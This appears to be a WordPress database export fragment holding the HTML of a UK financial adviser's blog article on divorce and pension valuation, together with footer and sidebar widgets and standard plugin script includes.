class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nTwitter\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"avada-row\"><p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\"><p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</p>\r\n<p>\r\n</section>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','inherit','closed','closed','','65-revision-v1','','','2018-12-18 16:14:19','2018-12-18 16:14:19','',65,'http://www.equalitywalk.org.uk/65-revision-v1',0,'revision','',0),(357,1,'2018-12-18 16:48:33','2018-12-18 16:48:33','<b>“Til Divorce Do Us Part”</b>\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">In February last year the Office for National Statistics released some depressing figures: <span style=\"font-size: 1.17em;\">The ONS estimates that 42% of marriages now end in divorce </span><span style=\"font-size: 1.17em;\">34% of marriages are expected to end in divorce by the 20</span><sup>th</sup><span style=\"font-size: 1.17em;\"><span style=\"font-size: 1.17em;\"> wedding anniversary </span></span>\r\n<span style=\"font-size: 1.17em;\">The greatest chance of divorce is between the 4</span><sup>th</sup><span style=\"font-size: 1.17em;\"> and 8</span><sup>th</sup><span style=\"font-size: 1.17em;\"> wedding anniversaries</span><span style=\"line-height: 1.5em;\"><img class=\"size-medium wp-image-215 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file3251255366828-193x300.jpg\" alt=\"\" width=\"193\" height=\"300\" />In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814.</span> The Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case.It is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.No-one gets married with the intention of splitting up – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are no children involved then it can be a simple process. If that’s the case with you, this <span style=\"color: #0000ff;\"><a href=\"http://www.resolution.org.uk/\"><span style=\"color: #0000ff;\">website could be useful</span></a>.</span>\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – and the more there will be a need for financial planning advice.\r\n\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\nThe value of a pension – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy.\r\n\r\nGetting divorced can be the saddest and frustrating part of your life.\r\n\r\nNo one ever gets married and has the expectative to later on get divorced so of course it is a time where both will go through a long process of frustration.\r\n\r\nSigning papers and documents can be time consuming and so are the other problems that come with it such as child custody and finance settlements. You will find these times to be very critical and having lawyers who know what they are doing by your side can be of some help as they are able to provide guidance. If you are going through stressful times <a href=\"https://emfl.com.au/property-settlements/\" target=\"_blank\">view this page</a> to contact lawyers who can help.\r\n\r\nTraditionally, solicitors have relied on the Duxbury Tables, particularly where divorce occurs in later life and one partner is to receive a lump sum which is intended to support him or her for the rest of their life.\r\n\r\nHowever these tables  were drawn up in 1992 (by Mrs Duxbury’s accountant) and life expectancy has increased significantly since then. Equally importantly, accepted rates of growth on investments have <i>decreased</i> significantly.\r\n\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. You’ve enough to worry about, without worrying about money.\r\n\r\nIf you feel that you may be heading towards a divorce – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n<p class=\"form-submit\"><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n\r\n</div>\r\n</div>\r\n<div id=\"respond\" class=\"comment-respond\"></div>\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								